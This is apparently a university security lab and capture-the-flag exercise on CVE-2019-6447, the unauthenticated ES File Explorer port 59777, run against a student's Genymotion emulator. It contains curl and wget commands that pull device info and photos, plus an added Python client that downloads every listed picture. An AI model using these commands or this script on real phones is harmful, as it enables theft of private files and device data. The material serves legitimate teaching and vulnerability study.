M 207: ES Explorer Command Injection (10 pts)

What You Need for This Project

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network: while the app is running it listens on TCP port 59777 and accepts commands from any host that can reach the phone, with no authentication.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019.

Find your Android Device's IP Address

Launch your Android emulator. In Settings, find your device's IP address, as shown below.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Genymotion device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154:5555
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Viewing the Listening Process

On Kali, in a Terminal, execute these commands:
adb shell
netstat -pant | grep LISTEN
exit
You see a process named "com.estrongs.android.pop" listening on port 59777, as shown below.

The Attack

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777
You see information about your phone, as shown below.

M 207: ftpPort (10 pts)

Find the text covered by a green box in the image above. That's the flag.

Extra Credit: Steal a Photo

If you have a webcam, you can do this.

In Genymotion, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

On your Android device, open the Camera app and take a photo, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777
Find the path to your image in the output, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values for your system:

wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads, as shown below.

On Kali, in a Terminal, execute this command to view the file, replacing the filename with the correct name on your system:

xdg-open IMG_20190116_141301.jpg
The file appears, as shown below.
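The attack steps above (POST getDeviceInfo, POST listPics, then GET the photo by its device path) as one script. This is an added example, not code from the original page or from the CVE-2019-6447 writeup. It assumes the service accepts a POST body of the form {"command": "..."} on the root path, that listPics replies with JSON objects carrying "name" and "location" keys, and that any absolute device path can be fetched with a plain GET; the sample replies inside the block are constructed, not captured from a device.

```python
#!/usr/bin/env python3
"""Client for the ES File Explorer HTTP service (CVE-2019-6447).

Added example, not code from the original page or from the vulnerability
writeup. Assumptions (not verified against every app version): the
service accepts a POST body {"command": "..."} on /, answers listPics with
a JSON array of objects that carry "name" and "location" keys, and serves
any absolute device path via GET http://<ip>:59777/<path>.
"""
import json
import os
import re
import socket
import sys
import urllib.request

ES_PORT = 59777

# Constructed sample of a listPics reply, in the shape this lab shows
# (not captured from a real device).
SAMPLE_LISTPICS = """[
{"name":"IMG_20190116_141301.jpg", "time":"1/16/19 2:13:01 PM", "location":"/storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg", "size":"1.07 MB (1,123,456 Bytes)"},
{"name":"Screenshot_001.png", "time":"1/16/19 2:20:45 PM", "location":"/storage/emulated/0/Pictures/Screenshots/Screenshot_001.png", "size":"212 KB (217,088 Bytes)"}
]"""

# Constructed sample with a trailing comma (not strict JSON) to exercise
# the fallback parser.
SAMPLE_BROKEN = '[{"name":"a.jpg","location":"/sdcard/DCIM/a.jpg"},]'

LOCATION_RE = re.compile(r'"location"\s*:\s*"([^"]*)"')


def es_url(ip, path=""):
    """URL for the service root or for a device path. Passing an absolute
    path gives the double slash seen in the wget command in this lab."""
    return "http://%s:%d/%s" % (ip, ES_PORT, path)


def build_command(command):
    """JSON body for a command such as getDeviceInfo or listPics."""
    return json.dumps({"command": command}).encode("utf-8")


def parse_list(reply):
    """Return (name, location) pairs from a listPics/listFiles reply.

    Tries strict JSON first; if the app's hand-built JSON does not parse,
    falls back to pulling every "location" value out of the raw text and
    uses the path's basename as the name.
    """
    try:
        data = json.loads(reply)
    except ValueError:
        return [(loc.rsplit("/", 1)[-1], loc) for loc in LOCATION_RE.findall(reply)]
    if isinstance(data, dict):
        data = [data]
    out = []
    for entry in data:
        if isinstance(entry, dict) and entry.get("location"):
            loc = entry["location"]
            out.append((entry.get("name") or loc.rsplit("/", 1)[-1], loc))
    return out


def port_open(ip, timeout=2.0):
    """TCP connect check: the listener is reachable from any LAN host."""
    try:
        with socket.create_connection((ip, ES_PORT), timeout=timeout):
            return True
    except OSError:
        return False


def send_command(ip, command, timeout=5.0):
    """POST one command to the service and return the raw reply text."""
    req = urllib.request.Request(
        es_url(ip), data=build_command(command),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def fetch_file(ip, location, dest):
    """GET a device path (no authentication needed) and save it locally."""
    urllib.request.urlretrieve(es_url(ip, location), dest)
    return dest


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "172.16.123.154"
    if not port_open(target):
        sys.exit("%s:%d is not reachable" % (target, ES_PORT))
    print(send_command(target, "getDeviceInfo"))
    for name, loc in parse_list(send_command(target, "listPics")):
        # basename() so a device-supplied name cannot write outside the cwd
        print("%s -> %s" % (loc, fetch_file(target, loc, os.path.basename(name))))
```

Run it as `python3 es_client.py 172.16.123.154` with the app open on the Genymotion device; it prints the getDeviceInfo reply (the flag field is in there) and then downloads every picture listPics reports. The regex fallback exists because the app builds its JSON by hand, so a reply that a strict parser rejects still yields the file paths.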

Email in a screenshot showing the photo in Kali, as shown above, for 10 pts extra credit.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command-line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.


Converted to a CTF 2-28-19
Extra credit explanation added 2-21-2020
Updated on 2-10-21